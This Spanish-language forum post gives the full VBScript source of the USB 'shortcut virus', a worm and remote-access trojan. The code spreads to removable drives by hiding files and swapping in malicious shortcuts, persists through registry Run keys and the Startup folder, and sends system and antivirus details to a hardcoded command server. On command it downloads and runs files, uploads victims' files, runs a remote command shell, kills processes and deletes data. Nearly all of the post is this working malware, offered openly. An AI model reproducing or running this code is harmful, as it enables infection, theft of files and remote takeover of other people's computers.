virus de accesos directos (SOURCE CODE) .

Iniciado por **Aincrad**, 24 Septiembre 2017, 04:20 AM

0 Miembros y 1 Visitante están viendo este tema.

**Aincrad**

hola a todo les traigo el virus de accesos directos (newphototaday) o tambien conocido como drive.bat ya que virus genera en los usb un batch con ese nombre.

el virus es un vbs.  en pendrives se encuentra con formato wsf por que esta cifrado.

virus vbs:

Código (actionscript) [Seleccionar]

'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

host = "update-flash.servehttp.com"
port = 666
installdir = "%temp%"
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")


'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next


instance
while true

install

response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
     param = cmd (1)
     execute param
case "update"
     param = cmd (1)
     oneonce.close
     set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
     oneonce.write param
     oneonce.close
     shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
     wscript.quit
case "uninstall"
     uninstall
case "send"
     download cmd (1),cmd (2)
case "site-send"
     sitedownloader cmd (1),cmd (2)
case "recv"
     param = cmd (1)
     upload (param)
case  "enum-driver"
     post "is-enum-driver",enumdriver  
case  "enum-faf"
     param = cmd (1)
     post "is-enum-faf",enumfaf (param)
case  "enum-process"
     post "is-enum-process",enumprocess  
case  "cmd-shell"
     param = cmd (1)
     post "is-cmd-shell",cmdshell (param)  
case  "delete"
     param = cmd (1)
     deletefaf (param)
case  "exit-process"
     param = cmd (1)
     exitprocess (param)
case  "sleep"
     param = cmd (1)
     sleep = eval (param)        
end select

wscript.sleep sleep

wend


sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
   filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
   if  filesystemobj.fileexists (drive.path & "\" & installname)  then
       filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
   end if
   for each file in filesystemobj.getfolder( drive.path & "\" ).Files
       if not lnkfile then exit for
       if  instr (file.name,".") then
           if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
               file.attributes = 2+4
               if  ucase (file.name) <> ucase (installname) then
                   filename = split(file.name,".")
                   set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
                   lnkobj.windowstyle = 7
                   lnkobj.targetpath = "cmd.exe"
                   lnkobj.workingdirectory = ""
                   lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                   fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
                   if  instr (fileicon,",") = 0 then
                       lnkobj.iconlocation = file.path
                   else
                       lnkobj.iconlocation = fileicon
                   end if
                   lnkobj.save()
               end if
           end if
       end if
   next
   for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
       if not lnkfolder then exit for
       folder.attributes = 2+4
       foldername = folder.name
       set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
       lnkobj.windowstyle = 7
       lnkobj.targetpath = "cmd.exe"
       lnkobj.workingdirectory = ""
       lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
       foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
       if  instr (foldericon,",") = 0 then
           lnkobj.iconlocation = folder.path
       else
           lnkobj.iconlocation = foldericon
       end if
       lnkobj.save()
   next
end If
end If
end if
next
err.clear
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
   for  each file in filesystemobj.getfolder ( drive.path & "\").files
        on error resume next
        if  instr (file.name,".") then
            if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 0
                if  ucase (file.name) <> ucase (installname) then
                    filename = split(file.name,".")
                    filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                else
                    filesystemobj.deletefile (drive.path & "\" & file.name)
                end If
            else
                filesystemobj.deletefile (file.path)
            end if
        end if
    next
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        folder.attributes = 0
    next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if  inf = "" then
   inf = hwid & spliter
   inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
   inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

   set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
   set os = root.execquery ("select * from win32_operatingsystem")
   for each osinfo in os
      inf = inf & osinfo.caption & spliter  
      exit for
   next
   inf = inf & "plus" & spliter
   inf = inf & security & spliter
   inf = inf & usbspreading
   information = inf  
else
   information = inf
end if
end function


sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub


function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
   if  disk.volumeserialnumber <> "" then
       hwid = disk.volumeserialnumber
       exit for
   end if
next
end function


function security
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
   versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
   security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
  if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
     usbspreading = "true - " & date
     shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  else
     usbspreading = "false - " & date
     shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

  end if
end If



upstart
set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
   shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
   wscript.quit
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
   objfsodownload.deletefile (strsaveto)
end if

if objhttpdownload.status = 200 then
  dim  objstreamdownload
  set  objstreamdownload = createobject("adodb.stream")
  with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
  end with
  set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
  shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub

sub download (fileurl,filedir)

if filedir = "" then
  filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
   objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
   dim  objstreamdownload
set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
   set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
  shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub


function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade
    .type = 1
    .open
.loadfromfile fileurl
buffer = .read
.close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function


function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
    enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function

function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
    enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
    enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
   enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
  readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
  readallfromany = oexec.stderr.readall
else
  readallfromany = ""
end if

cmdshell = readallfromany
end function


                                                                            Comenten.